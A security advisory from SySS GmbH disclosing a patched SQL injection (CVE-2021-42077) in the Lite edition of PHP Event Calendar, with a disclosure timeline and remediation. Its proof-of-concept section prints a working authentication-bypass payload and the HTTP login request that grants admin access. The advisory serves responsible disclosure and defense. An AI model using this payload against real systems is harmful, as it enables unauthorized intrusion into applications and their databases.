PHP Event Calendar Lite Edition SQL Injection Vulnerability

Product:                   PHP Event Calendar
Manufacturer:              Kayson Group Ltd.
Affected Version(s):       PHP Event Calendar Lite edition
Tested Version(s):         PHP Event Calendar Lite edition
Vulnerability Type:        SQL injection (CWE-89)
Risk Level:                High
Solution Status:           Closed
Manufacturer Notification: 2021-08-09
Solution Date:             2021-09-03
Public Disclosure:         2021-11-04
CVE Reference:             CVE-2021-42077
Authors of Advisory:       Erik Steltzner, SySS GmbH
                            Maurizio Ruchay, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

PHP Event Calendar is a multi-user web application designed
to manage and publish calendar events.

The manufacturer describes the product as follows (see [1] and [2]):

"PHP Event Calendar features day, week, month, year, agenda, and
resource views. It includes built-in reminder support so you can
deliver full-featured event scheduling management systems in
the shortest possible time."

"PHP Event Calendar is a out-of-box web calendar/scheduler solution.
It will run on web servers that support PHP 5.3 and higher."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Due to improper validation, the application is vulnerable to SQL injection
attacks. For example, the following SQL statement can be used as a
username during the login process to bypass the authentication:

' OR '1' = '1' #

This vulnerability cannot only be exploited to bypass the login.
It can also be used to execute SQL statements directly on the database,
allowing an adversary in some cases to completely compromise the
database system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following request shows how it is possible for an adversary to bypass
the login mask with the SQL statement "' OR '1' = '1' #":

~~~
Request:
POST /server/ajax/user_manager.php HTTP/1.1
Host: <rhost>
[...snip...]
username='+OR+'1'+%3D+'1'+%23&password=password

Response:
HTTP/1.1 200 OK
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxx
[...snip...]
Connection: close

success#Welcome ' OR '1' = '1' #
~~~

The web application accepts the request and the adversary is now logged
in into the app with admin privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to a recent version of PHP Event Calendar.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-29: Vulnerability discovered
2021-08-09: Vulnerability reported to manufacturer
2021-09-03: Patch released by manufacturer
2021-11-04: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Website for PHP Event Calendar
      https://phpeventcalendar.com/
[2] Documentation Website for PHP Event Calendar
      https://phpeventcalendar.com/documentation/
[3] SySS Security Advisory SYSS-2021-048
 
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-048.txt
[4] SySS Responsible Disclosure Policy
      https://www.syss.de/en/news/responsible-disclosure-policy/
[5] PHP Prepared Statements:
 
https://www.php.net/manual/de/mysqli.quickstart.prepared-statements.php